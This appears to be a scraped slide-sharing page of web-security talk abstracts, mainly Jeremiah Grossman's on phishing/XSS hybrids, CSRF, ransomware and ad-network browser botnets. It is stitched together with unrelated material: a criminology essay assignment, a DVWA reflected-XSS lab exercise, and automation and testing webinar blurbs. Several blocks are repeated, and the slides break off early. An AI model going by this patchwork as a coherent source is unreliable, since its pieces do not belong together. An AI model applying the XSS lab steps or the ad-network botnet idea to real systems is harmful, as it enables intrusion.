Phishing with Super Bait
Jeremiah Grossman, Founder and CTO, WhiteHat Security
The use of phishing/cross-site scripting (XSS) hybrid attacks for financial gain is spreading. ItÕs imperative that security professionals familiarize themselves with these new threats to protect their websites and confidential corporate information.
This isn't just another presentation about phishing scams or cross-site scripting. WeÕre all very familiar with each of those issues. Instead, weÕll discuss the potential impact when the two are combined to form new attack techniques. Phishers are beginning to exploit these techniques, creating new phishing attacks that are virtually impervious to conventional security measures. Secure sockets layer (SSL), blacklists, token-based authentication, browser same-origin policy, and monitoring / take-down services offer little protection. Even eyeballing the authenticity of a URL is unlikely to help.
By leveraging cross-site scripting, the next level of phishing scams will be launched not from look-alike web pages, but instead from legitimate websites! This presentation will demonstrate how these types of attacks are being achieved. We'll also demonstrate the cutting edge exploits that can effectively turn your browser into spyware with several lines of JavaScript. And, we'll give you the steps you need to take to protect your websites from these attacks.
Your users are almost certainly vulnerable in one way or another. Mike North explores a series of common web app security pitfalls, first demonstrating how to exploit the vulnerability and then recommending a pragmatic and effective defense against the attack. Buckle up, because Mike's about to take some things you love and depend on and smash them to bits.
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
Web Application Security: The Land that Information Security Forgot
Today, the vast majority of those within information security have heard about web application security and posses at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.
Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".
This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures.
Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah was designing, auditing, and penetration-testing the huge company's web applications which demand highest security.
During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as the Defcon, Air Force and Technology Conference, ToorCon, and others.
Jeremiah is a lead contributor to the "Open Web Application Security Project" www.owasp.com and considered to be among the foremost web security experts.
Basic overview, testing, mitigation plan for popular web application vulnerabilities such as: XSS, CSRF, SQLi etc.
Updated "Web Security - Introduction" presentation.
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
Cross-Site Request Forgery (CSRF in short) is a kind of a web application vulnerability which allows malicious website to send unauthorized requests to a vulnerable website using active session of its authorized users
In simple words, it’s when an “evil” website posts a new status in your twitter account on your visit while the login session is active on twitter.
For security reasons the same origin policy in browsers restricts access for browser-side programming languages such as Javascript to access a remote content.
As the browsers configurations may be modified, the best way to protect web application against CSRF is to secure web application itself.
Top Ten Web Hacking Techniques of 2008:
"What's possible, not probable"
The polls are closed, votes are in, and we have the winners making up the Top Ten Web Hacking Techniques of 2008! The competition was fierce with the newest and most innovative web hacking techniques to the test. This session will review the top ten hacks from 2008 - what they indicate about the security of the web, what they mean for businesses, and what might be used against us soon down the road.
Your users are almost certainly vulnerable in one way or another. Mike North explores a series of common web app security pitfalls, first demonstrating how to exploit the vulnerability and then recommending a pragmatic and effective defense against the attack. Buckle up, because Mike's about to take some things you love and depend on and smash them to bits.
Web Application Security: The Land that Information Security ForgotJeremiah Grossman
Web Application Security: The Land that Information Security Forgot
Today, the vast majority of those within information security have heard about web application security and posses at least a vague understanding of the risks involved. However, the multitude of attacks which make this area of security important, for the most part, go undocumented, unexplained and misunderstood. As a result, our web applications become undefended and at the mercy of a determined attacker. In order to gain a deeper understanding of the threats, witnessing these attacks first hand is essential.
Make no mistake, insecure and unprotected web applications are the fastest, easiest, and arguably the most utilized route to compromise networks and exploit users. What's worse is that conventional security measures lack the proper safeguards and offer little protection, resulting in nothing more than a "false sense of security".
This discussion will cover theory surrounding some of the more dangerous web application attacks, examples of the attack in action, and possible countermeasures.
Founder and chairman of WhiteHat Security, and former information security officer with Yahoo!. As information security officer at Yahoo!, Jeremiah was designing, auditing, and penetration-testing the huge company's web applications which demand highest security.
During his past 5 years of employment, Jeremiah has been researching and applying information security with special emphasis on prevention of web application sabotage. Grossman has presented "Web Application Security" talks at many security conventions such as the Defcon, Air Force and Technology Conference, ToorCon, and others.
Jeremiah is a lead contributor to the "Open Web Application Security Project" www.owasp.com and considered to be among the foremost web security experts.
Basic overview, testing, mitigation plan for popular web application vulnerabilities such as: XSS, CSRF, SQLi etc.
Updated "Web Security - Introduction" presentation.
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
Cross-Site Request Forgery (CSRF in short) is a kind of a web application vulnerability which allows malicious website to send unauthorized requests to a vulnerable website using active session of its authorized users
In simple words, it’s when an “evil” website posts a new status in your twitter account on your visit while the login session is active on twitter.
For security reasons the same origin policy in browsers restricts access for browser-side programming languages such as Javascript to access a remote content.
As the browsers configurations may be modified, the best way to protect web application against CSRF is to secure web application itself.
Top Ten Web Hacking Techniques of 2008:
"What's possible, not probable"
The polls are closed, votes are in, and we have the winners making up the Top Ten Web Hacking Techniques of 2008! The competition was fierce with the newest and most innovative web hacking techniques to the test. This session will review the top ten hacks from 2008 - what they indicate about the security of the web, what they mean for businesses, and what might be used against us soon down the road.
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANSamvel Gevorgyan
"Web Application Security is a vast topic
and time is not enough to cover all kind
of malicious attacks and techniques for
avoiding them, so now we will focus on
top 10 high level vulnerabilities.
Web developers work in different ways
using their custom libraries and
intruder prevention systems and now
we will see what they should do and
should not do based on best practices."
- Samvel Gevorgyan
[ Presentation on Scribd ]
http://www.scribd.com/doc/47157267
A presentation+class delivered to a PHP developer group at Brown University that discussed Web Application Security with a heavy emphasis on PHP, and discussed security in the SDLC, and showed with some examples what to do and not do
Content Management System Security.
How to secure your CMS?
Common rules:
+ Choose your CMS with both functionality and security in mind
+ Update with urgency
+ Use a strong password (admin dashboard access, database users, etc.)
+ Have a firewall in place (detect or prevent suspicious requests)
+ Keep track of the changes to your site and their source code
+ Give the user permissions (and their levels of access) a lot of thought
+ Limit the type of files to non-executables and monitor them closely
+ Backup your CMS (daily backups of your files and databases)
+ Uninstall plugins you do not use or trust.
http://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/
Recorded Webinar: https://www.whitehatsec.com/webinar/whitehat_webinar_march2713.html
Every year the security community produces a stunning amount of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and their mobile platform equivilents. Beyond individual vulnerabilities with CVE numbers or system compromises, here we are solely focused on new and creative methods of Web-based attack. Now it its seventh year, The Top Ten Web Hacking Techniques list encourages information sharing, provides a centralized knowledge-base, and recognizes researchers who contribute excellent work. Past Top Tens and the number of new attack techniques discovered in each year:
Understanding word press security wwc-4-7-17Nicholas Batik
WordPress is a powerful tool for presenting your information on the web, but with great power comes great responsibility – and great targets for people intending various criminal intent. This presentation illustrates some of the risks and ways to mitigate them.
XPC is a well-known interprocess communication mechanism used on Apple devices. Abusing XPC led to many severe bugs, including those used in jailbreaks. While the XPC bugs in Apple's components are harder and harder to exploit, did we look at non-Apple apps on macOS? As it turns out, vulnerable apps are everywhere - Anti Viruses, Messengers, Privacy tools, Firewalls, and more.
This presentation:
1.Explain how XPC/NSXPC work
2.Present you some of my findings in popular macOS apps (e.g. local privilege escalation to r00t)
3.Abuse an interesting feature on Catalina allowing to inject an unsigned dylib
4.Show you how to fix that vulnz finally!
Reading this slide can help you to understaning the webserver security challenges and also different ways to mitigate these challenges and keep your web server secured. If this slide is helpful to you, please do well to acknowledge me by donating to charity. Thanks
When and why to stray from Chrome, Edge, or Firefox, some programs and extensions to support your Internet experience, and the increasing complexity of the dangers of going online.
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANSamvel Gevorgyan
"Web Application Security is a vast topic
and time is not enough to cover all kind
of malicious attacks and techniques for
avoiding them, so now we will focus on
top 10 high level vulnerabilities.
Web developers work in different ways
using their custom libraries and
intruder prevention systems and now
we will see what they should do and
should not do based on best practices."
- Samvel Gevorgyan
[ Presentation on Scribd ]
http://www.scribd.com/doc/47157267
A presentation+class delivered to a PHP developer group at Brown University that discussed Web Application Security with a heavy emphasis on PHP, and discussed security in the SDLC, and showed with some examples what to do and not do
Content Management System Security.
How to secure your CMS?
Common rules:
+ Choose your CMS with both functionality and security in mind
+ Update with urgency
+ Use a strong password (admin dashboard access, database users, etc.)
+ Have a firewall in place (detect or prevent suspicious requests)
+ Keep track of the changes to your site and their source code
+ Give the user permissions (and their levels of access) a lot of thought
+ Limit the type of files to non-executables and monitor them closely
+ Backup your CMS (daily backups of your files and databases)
+ Uninstall plugins you do not use or trust.
http://blog.whitehatsec.com/top-ten-web-hacking-techniques-of-2012/
Recorded Webinar: https://www.whitehatsec.com/webinar/whitehat_webinar_march2713.html
Every year the security community produces a stunning amount of new Web hacking techniques that are published in various white papers, blog posts, magazine articles, mailing list emails, conference presentations, etc. Within the thousands of pages are the latest ways to attack websites, Web browsers, Web proxies, and their mobile platform equivilents. Beyond individual vulnerabilities with CVE numbers or system compromises, here we are solely focused on new and creative methods of Web-based attack. Now it its seventh year, The Top Ten Web Hacking Techniques list encourages information sharing, provides a centralized knowledge-base, and recognizes researchers who contribute excellent work. Past Top Tens and the number of new attack techniques discovered in each year:
Understanding word press security wwc-4-7-17Nicholas Batik
WordPress is a powerful tool for presenting your information on the web, but with great power comes great responsibility – and great targets for people intending various criminal intent. This presentation illustrates some of the risks and ways to mitigate them.
XPC is a well-known interprocess communication mechanism used on Apple devices. Abusing XPC led to many severe bugs, including those used in jailbreaks. While the XPC bugs in Apple's components are harder and harder to exploit, did we look at non-Apple apps on macOS? As it turns out, vulnerable apps are everywhere - Anti Viruses, Messengers, Privacy tools, Firewalls, and more.
This presentation:
1.Explain how XPC/NSXPC work
2.Present you some of my findings in popular macOS apps (e.g. local privilege escalation to r00t)
3.Abuse an interesting feature on Catalina allowing to inject an unsigned dylib
4.Show you how to fix that vulnz finally!
Reading this slide can help you to understaning the webserver security challenges and also different ways to mitigate these challenges and keep your web server secured. If this slide is helpful to you, please do well to acknowledge me by donating to charity. Thanks
When and why to stray from Chrome, Edge, or Firefox, some programs and extensions to support your Internet experience, and the increasing complexity of the dangers of going online.
Ransomware is a type of malicious software that blocks access to data or threatens to publish it until a ransom is paid. Simple ransomware may lock the system in a way which is not difficult for a knowledgeable person to reverse. More advanced malware uses a technique called cryptoviral extortion, in which it encrypts the victim's files, making them inaccessible, and demands a ransom payment to decrypt them and ransomware attacks 2017
Given at TRISC 2010, Grapevine, Texas.
http://www.trisc.org/speakers/aditya_sood/#p
The talk sheds light on the new trends of web based malware. Technology and Insecurity goes hand in hand. With the advent of new attacks and techniques the distribution of malware through web has been increased tremendously. Browser based exploits mainly Internet Explorer have given a birth to new world of malware infection. The attackers spread malware elegantly by exploiting the vulnerabilities and drive by downloads. The infection strategies opted by attackers like malware distribution through IFRAME injections and Search Engine Optimization. In order to understand the intrinsic behavior of these web based malware a typical analysis is required to understand the logic concept working behind these web based malwares. It is necessary to dissect these malwares from bottom to top in order to control the devastating behavior. The talk will cover structured methodologies and demonstrate the static, dynamic and behavioral analysis of web malware including PCAP analytics. Demonstrations will prove the fact and necessity of web malware analysis.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today’s corporate websites, learning real-world solutions to today’s web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
Continuing in your role as a human service provider for your local.docxrichardnorman90310
Continuing in your role as a human service provider for your local community, your manager has asked you to write an opinion piece for the local newspaper discussing gaps in prison and jail services in their state.
Write an opinion article that is 900 words. Complete the following in your article:
· Describe the major beliefs of 4 criminological theories.
· For each criminological theory, explain what human services should be provided to inmates.
· Of the services identified for each criminological theory, list the services that are not currently provided by your local or state agencies.
· Discuss your personal beliefs related to which human services should be provided by your local or state agencies.
· Discuss a conclusion focused on changes in human services you would like to see made by your local or state agencies.
Lab-8: Web Hacking
Websites have always been among the first targets of hackers. There are many reasons for this. These are the most important ones:
1) Websites have to be reachable from the Internet. Their primary purpose is to publish something or provide some service for the public
2) There are more than 1 billion websites as almost every organization, and many individuals have websites
3) As opposed to the earlier years of the world wide web, websites are very dynamic today. They come with forms and dynamic applications implemented by many different frontend and backend technologies. A wide variety of dynamic applications not only bring more functionality to web applications but also introduces vulnerabilities.
As a result, we are talking about something valuable that is billions in amount, accessible by anybody, and a commonplace for wrong implementation and vulnerabilities.Section-1: Exploit Cross-Site Scripting (XSS) Vulnerability
An XSS attack enables malicious users to inject client-side scripts such as JavaScript codes into web pages viewed by other users. The term XSS is used to describe both the vulnerability and the attack type, such as XSS attack / XSS vulnerability on the web application.
1) Log into Windows 7 Attacker on the Netlab environment.
2) Open Firefox by clicking the icon on the desktop or start menu
3) Visit this page
http://192.168.2.15/dvwa/login.php
This is the "Damn Vulnerable Web Application" hosted on the OWASP BWA machine on Netlab.
4)
Log in to web application by typing
user as Username and
user as Password. After logging in, you will see the page below.
5) Click on the XSS reflected on the left menu and type your nickname into the textbook at the right pane of the webpage. (I typed "ethical" and clicked the submit button. The web application gets what you typed as the input, add Hello to the beginning, and prints to the screen.
6)
Try some basic HTML tags now. Type
<h1>your nickname</h1>
I typed "<h1>ethical</h1> and then clicked submit button. I confirm .
video demos: http://whitehatsec.com/home/assets/videos/Top10WebHacks_Webinar031711.zip
Many notable and new Web hacking techniques were revealed in 2010. During this presentation, Jeremiah Grossman will describe the technical details of the top hacks from 2010, as well as some of the prevalent security issues emerging in 2011. Attendees will be treated to a step-by-step guided tour of the newest threats targeting today's corporate websites and enterprise users.
The top attacks in 2010 include:
• 'Padding Oracle' Crypto Attack
• Evercookie
• Hacking Auto-Complete
• Attacking HTTPS with Cache Injection
• Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
• Universal XSS in IE8
• HTTP POST DoS
• JavaSnoop
• CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
• Java Applet DNS Rebinding
Mr. Grossman will then briefly identify real-world examples of each of these vulnerabilities in action, outlining how the issue occurs, and what preventative measures can be taken. With that knowledge, he will strategize what defensive solutions will have the most impact.
There is a serious misalignment of interests between Application Security vulnerability assessment vendors and their customers. Vendors are incentivized to report everything they possible can, even issues that rarely matter. On the other hand, customers just want the vulnerability reports that are likely to get them hacked. Every finding beyond that is a waste of time, money, and energy, which is precisely what’s happening every day.
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
Do you know what an asset inventory is, why it's important, and how it can protect you from cybersecurity vulnerabilities?
In this webinar, you can expect to learn:
- How to prepare yourself and your staff against cybersecurity threats
- What an asset inventory is and why it's the next big thing in information security
- How to identify all your company's Internet-connected assets and which need to be defended
- Why keeping an up-to-date asset inventory is important
- How to obtain your own attack surface map
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
The present study examined a selection of 76 ransomware splash screens collected from a variety of sources. These splash screens were analysed according to surface information, including aspects of visual appearance, the use of language, cultural icons, payment and payment types. The results from the current study showed that, whilst there was a wide variation in the construction of ransomware splash screens, there was a good degree of commonality, particularly in terms of the structure and use of key aspects of social engineering used to elicit payment from the victims. There was the emergence of a sub-set of ransomware that, in the context of this report, was termed ‘Cuckoo’ ransomware. This type of attack often purported to be from an official source requesting payment for alleged transgressions.
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
Ransomware is center stage, as campaigns are practically guaranteed financial gain. Cyber-criminals profit hundreds of millions of dollars by selling our data back to us. If you look closely, the ransomware economic dynamics closely follow the real-world kidnapping and ransom industry. We’ll explore the eerie similarities, where ransomware is headed, and strategies we can bring to the fight.
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
Ransomware is center stage, as campaigns are practically guaranteed financial gain. Cyber-criminals profit hundreds of millions of dollars by selling our data back to us. If you look closely, the ransomware economic dynamics closely follow the real-world kidnapping and ransom industry. We’ll explore the eerie similarities, where ransomware is headed, and strategies we can bring to the fight.
In the past two decades of tech booms, busts, and bubbles, two things have not changed - hackers are still nding ways to breach security measures in place, and the endpoint remains the primary target. And now, with cloud and mobile computing, endpoint devices have become the new enterprise security perimeter, so there is even more pressure to lock them down.
Companies are deploying piles of software on the endpoint to secure it - antivirus, anti- malware, desktop rewalls, intrusion detection, vulnerability management, web ltering, anti-spam, and the list goes on. Yet with all of the solutions in place, high pro le companies are still being breached. The recent attacks on large retail and hospitality organizations are prime examples, where hackers successfully used credit-card-stealing-malware targeting payment servers to collect customer credit card information.
Ransomware is Here: Fundamentals Everyone Needs to KnowJeremiah Grossman
If you’re an IT professional, you probably know at least the basics of ransomware. Instead of using malware or an exploit to exfiltrate PII from an enterprise, bad actors instead find valuable data and encrypt it. Unless you happen to have an NSA-caliber data center at your disposal to break the encryption, you must pay your attacker in cold, hard bitcoins—or else wave goodbye to your PII. Those assumptions aren’t wrong, but they also don’t tell the whole picture.
During this event we’ll discuss topics such as:
Why Ransomware is Exploding
The growth of ransomware, as opposed to garden-variety malware, is enormous. Hackers have found that they can directly monetize the data they encrypt, which eliminates the time-consuming process of selling stolen data on the Darknet. In addition, the use of ransomware requires little in the way of technical skill—because attackers don’t need to get root on a victim’s machine.
Who the Real Targets Are
Two years ago, the most newsworthy victims of ransomware were various police departments. This year, everyone is buzzing about hospitals. Is this a deliberate pattern? Probably not. Enterprises are so ill-prepared for ransomware that attackers have a green field to wreak havoc. Until the industry shapes up, bad actors will target ransomware indiscriminately.
Where Ransomware Stumbles
Although ransomware is nearly impossible to dislodge when employed correctly, you may be surprised to find that not all bad actors have the skill to do it. Even if ransomware targets your network, you may learn that your attackers have used extremely weak encryption—or that they’ve encrypted files that are entirely non-critical.
As far as ransomware is concerned, forewarned is forearmed. Once you know how attackers deliver ransomware, who they’re likely to attack, and the weaknesses in the ransomware deployment model, you’ll be able to understand how to protect your enterprise.
This year WhiteHat SecurityTM celebrates its fteenth anniversary, and the eleventh year that we have produced the Web Applications Security Statistics Report. The stats shared in this report are based on the aggregation of all the scanning and remediation data obtained from applications that used the WhiteHat SentinelTM service for application security testing in 2015. As an early pioneer in the Application Security Market, WhiteHat has a large and unique collection of data to work with.
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
WhiteHat Security’s Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address in order to conduct business online safely.
Website security is an ever-moving target. New website launches are common, new code is released constantly, new web technologies are created and adopted every day; as a result, new attack techniques are frequently disclosed that can put every online business at risk. In order to stay protected, enterprises must receive timely information about how they
can most efficiently defend their websites, gain visibility into
the performance of their security programs, and learn how they compare with their industry peers. Obtaining these insights
is crucial in order to stay ahead and truly improve enterprise website security.
To help, WhiteHat Security has been publishing its Website Security Statistics Report since 2006. This report is the only one that focuses exclusively on unknown vulnerabilities in custom web applications, code that is unique to an organization, and found in real-world websites. The underlying data is hundreds of terabytes in size, comprises vulnerability assessment results from tens of thousands of websites across hundreds of the most well- known organizations, and collectively represents the largest and most accurate picture of website security available. Inside this report is information about the most prevalent vulnerabilities, how many get fixed, how long the fixes can take on average, and how every application security program may measurably improve. The report is organized by industry, and is accompanied by WhiteHat Security’s expert analysis and recommendations.
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
Ever notice how everything in InfoSec is sold “as is”? No guarantees, no warrantees, no return policies. For some reason in InfoSec, providing customers with a form of financial coverage for their investment is seen as gimmicky, but the tides and times are changing. This talk discusses use cases on why guarantees are a must have and how guarantees benefit customers as well as InfoSec as a whole.
In this report, we put this area of application security understanding to the test by measuring how various web programming languages and development frameworks actually perform in the field. To which classes of attack are they most prone, how often and for how long; and, how do they fare against popular alternatives? Is it really true that the most popular modern languages and frameworks yield similar results in production websites?
By analyzing the vulnerability assessment results of more than 30,000 websites under management with WhiteHat Sentinel, we begin to answer these questions. These answers may enable the application security community to ask better and deeper questions, which will eventually lead to more secure websites. Organizations deploying these technologies can have a closer look at particularly risk-prone areas. Software vendors may focus on areas that are found to be lacking. Developers can increase their familiarity with the strengths and weaknesses of their technology stack. All of this is vitally important because security must be baked into development frameworks and must be virtually transparent. Only then will application security progress be made.
In this report, we put this area of application security understanding to the test by measuring how various web programming languages and development frameworks actually perform in the field. To which classes of attack are they most prone, how often and for how long; and, how do they fare against popular alternatives? Is it really true that the most popular modern languages and frameworks yield similar results in production websites?
By analyzing the vulnerability assessment results of more than 30,000 websites under management with WhiteHat Sentinel, we begin to answer these questions. These answers may enable the application security community to ask better and deeper questions, which will eventually lead to more secure websites. Organizations deploying these technologies can have a closer look at particularly risk-prone areas. Software vendors may focus on areas that are found to be lacking. Developers can increase their familiarity with the strengths and weaknesses of their technology stack. All of this is vitally important because security must be baked into development frameworks and must be virtually transparent. Only then will application security progress be made.
http://blackhat.com/us-13/briefings.html#Grossman
Online advertising networks can be a web hacker’s best friend. For mere pennies per thousand impressions (that means browsers) there are service providers who allow you to broadly distribute arbitrary javascript -- even malicious javascript! You are SUPPOSED to use this “feature” to show ads, to track users, and get clicks, but that doesn’t mean you have to abide. Absolutely nothing prevents spending $10, $100, or more to create a massive javascript-driven browser botnet instantly. The real-world power is spooky cool. We know, because we tested it… in-the-wild.
With a few lines of HTML5 and javascript code we’ll demonstrate just how you can easily commandeer browsers to perform DDoS attacks, participate in email spam campaigns, crack hashes and even help brute-force passwords. Put simply, instruct browsers to make HTTP requests they didn’t intend, even something as well-known as Cross-Site Request Forgery. With CSRF, no zero-days or malware is required. Oh, and there is no patch. The Web is supposed to work this way. Also nice, when the user leaves the page, our code vanishes. No traces. No tracks.
Before leveraging advertising networks, the reason this attack scenario didn’t worry many people is because it has always been difficult to scale up, which is to say, simultaneously control enough browsers (aka botnets) to reach critical mass. Previously, web hackers tried poisoning search engine results, phishing users via email, link spamming Facebook, Twitter and instant messages, Cross-Site Scripting attacks, publishing rigged open proxies, and malicious browser plugins. While all useful methods in certain scenarios, they lack simplicity, invisibility, and most importantly -- scale. That’s what we want! At a moment’s notice, we will show how it is possible to run javascript on an impressively large number of browsers all at once and no one will be the wiser. Today this is possible, and practical.
WhiteHat Security’s Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address in order to conduct business online safely.
Website security is an ever-moving target. New website launches are common, new code is released constantly, new Web technologies are created and adopted every day; as a result, new attack techniques are frequently disclosed that can put every online business at risk. In order to stay protected, enterprises must receive timely information about how they can most efficiently defend their websites, gain visibility into the performance of their security programs, and learn how they compare with their industry peers. Obtaining these insights is crucial in order to stay ahead and truly improve enterprise website security.
To help, WhiteHat Security has been publishing its Website Security Statistics Report since 2006. This report is the only one that focuses exclusively on unknown vulnerabilities in custom Web applications, code that is unique to an organization, and found in real-world websites. The underlying data is hundreds of terabytes in size, comprises vulnerability assessment results from tens of thousands of websites across hundreds of the most well-known organizations, and collectively represents the largest and most accurate picture of website security available. Inside this report is information about the most prevalent vulnerabilities, how many get fixed, how long the fixes can take on average, and how every application security program may measurably improve. The report is organized by industry, and is accompanied by WhiteHat Security’s expert analysis and recommendations.
Through its Software-as-a-Service (SaaS) offering, WhiteHat Sentinel, WhiteHat Security is uniquely positioned to deliver the depth of knowledge that organizations require to protect their brands, attain compliance, and avert costly breaches.
WhiteHat Security, the Web security company, today released the twelfth installment of the WhiteHat Security Website Security Statistics Report. The report reviewed serious vulnerabilities* in websites during the 2011 calendar year, examining the severity and duration of the most critical vulnerabilities from 7,000 websites across major vertical markets. Among the findings in the report, WhiteHat research suggests that the average number of serious vulnerabilities found per website per year in 2011 was 79, a substantial reduction from 230 in 2010 and down from 1,111 in 2007. Despite the significant improvement in the state of website security, organizational challenges in creating security programs that balance breadth of coverage and depth of testing leave large-scale attack surfaces or small, but very high-risk vulnerabilities open to attackers.
The report examined data from more than 7,000 websites across over 500 organizations that are continually assessed for vulnerabilities by WhiteHat Security’s family of Sentinel Services. This process provides a real-world look at website security across a range of vertical markets, including findings from the energy and non-profit verticals for the first time this year. The metrics provided serve as a foundation for improving enterprise application security online.
Slack (or Teams) Automation for Bonterra Impact Management (fka Social Soluti...Jeffrey Haguewood
Sidekick Solutions uses Bonterra Impact Management (fka Social Solutions Apricot) and automation solutions to integrate data for business workflows.
We believe integration and automation are essential to user experience and the promise of efficient work through technology. Automation is the critical ingredient to realizing that full vision. We develop integration products and services for Bonterra Case Management software to support the deployment of automations for a variety of use cases.
This video focuses on the notifications, alerts, and approval requests using Slack for Bonterra Impact Management. The solutions covered in this webinar can also be deployed for Microsoft Teams.
Interested in deploying notification automations for Bonterra Impact Management? Contact us at sales@sidekicksolutionsllc.com to discuss next steps.
The Art of the Pitch: WordPress Relationships and SalesLaura Byrne
Clients don’t know what they don’t know. What web solutions are right for them? How does WordPress come into the picture? How do you make sure you understand scope and timeline? What do you do if sometime changes?
All these questions and more will be explored as we talk about matching clients’ needs with what your agency offers without pulling teeth or pulling your hair out. Practical tips, and strategies for successful relationship building that leads to closing the deal.
JMeter webinar - integration with InfluxDB and GrafanaRTTS
Watch this recorded webinar about real-time monitoring of application performance. See how to integrate Apache JMeter, the open-source leader in performance testing, with InfluxDB, the open-source time-series database, and Grafana, the open-source analytics and visualization application.
In this webinar, we will review the benefits of leveraging InfluxDB and Grafana when executing load tests and demonstrate how these tools are used to visualize performance metrics.
Length: 30 minutes
Session Overview
-------------------------------------------
During this webinar, we will cover the following topics while demonstrating the integrations of JMeter, InfluxDB and Grafana:
- What out-of-the-box solutions are available for real-time monitoring JMeter tests?
- What are the benefits of integrating InfluxDB and Grafana into the load testing stack?
- Which features are provided by Grafana?
- Demonstration of InfluxDB and Grafana using a practice web application
To view the webinar recording, go to:
https://www.rttsweb.com/jmeter-integration-webinar
"Impact of front-end architecture on development cost", Viktor TurskyiFwdays
I have heard many times that architecture is not important for the front-end. Also, many times I have seen how developers implement features on the front-end just following the standard rules for a framework and think that this is enough to successfully launch the project, and then the project fails. How to prevent this and what approach to choose? I have launched dozens of complex projects and during the talk we will analyze which approaches have worked for me and which have not.
Epistemic Interaction - tuning interfaces to provide information for AI supportAlan Dix
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
Connector Corner: Automate dynamic content and events by pushing a buttonDianaGray10
Here is something new! In our next Connector Corner webinar, we will demonstrate how you can use a single workflow to:
Create a campaign using Mailchimp with merge tags/fields
Send an interactive Slack channel message (using buttons)
Have the message received by managers and peers along with a test email for review
But there’s more:
In a second workflow supporting the same use case, you’ll see:
Your campaign sent to target colleagues for approval
If the “Approve” button is clicked, a Jira/Zendesk ticket is created for the marketing design team
But—if the “Reject” button is pushed, colleagues will be alerted via Slack message
Join us to learn more about this new, human-in-the-loop capability, brought to you by Integration Service connectors.
And...
Speakers:
Akshay Agnihotri, Product Manager
Charlie Greenberg, Host
Let's dive deeper into the world of ODC! Ricardo Alves (OutSystems) will join us to tell all about the new Data Fabric. After that, Sezen de Bruijn (OutSystems) will get into the details on how to best design a sturdy architecture within ODC.
UiPath Test Automation using UiPath Test Suite series, part 4DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 4. In this session, we will cover Test Manager overview along with SAP heatmap.
The UiPath Test Manager overview with SAP heatmap webinar offers a concise yet comprehensive exploration of the role of a Test Manager within SAP environments, coupled with the utilization of heatmaps for effective testing strategies.
Participants will gain insights into the responsibilities, challenges, and best practices associated with test management in SAP projects. Additionally, the webinar delves into the significance of heatmaps as a visual aid for identifying testing priorities, areas of risk, and resource allocation within SAP landscapes. Through this session, attendees can expect to enhance their understanding of test management principles while learning practical approaches to optimize testing processes in SAP environments using heatmap visualization techniques
What will you get from this session?
1. Insights into SAP testing best practices
2. Heatmap utilization for testing
3. Optimization of testing processes
4. Demo
Topics covered:
Execution from the test manager
Orchestrator execution result
Defect reporting
SAP heatmap example with demo
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
1. Phishing with Super Bait
Jeremiah Grossman
WhiteHat Security
Founder and Chief Technology Officer
2. Who am I?
Day Job:
Technology R&D and industry evangelist
Frequent Black Hat and industry speaker
Author of several web security articles/white papers
Night Job:
Founder of the Web Application Security Consortium (WASC)
www.webappsec.org
Past Job:
Yahoo Information Security Officer
3. WhiteHat Security
Real-World Solutions for Web Application Security
WhiteHat Security is a leading provider of web
application
security services. WhiteHat delivers comprehensive,
easy-to
use, cost-effective solutions that enable companies to
secure
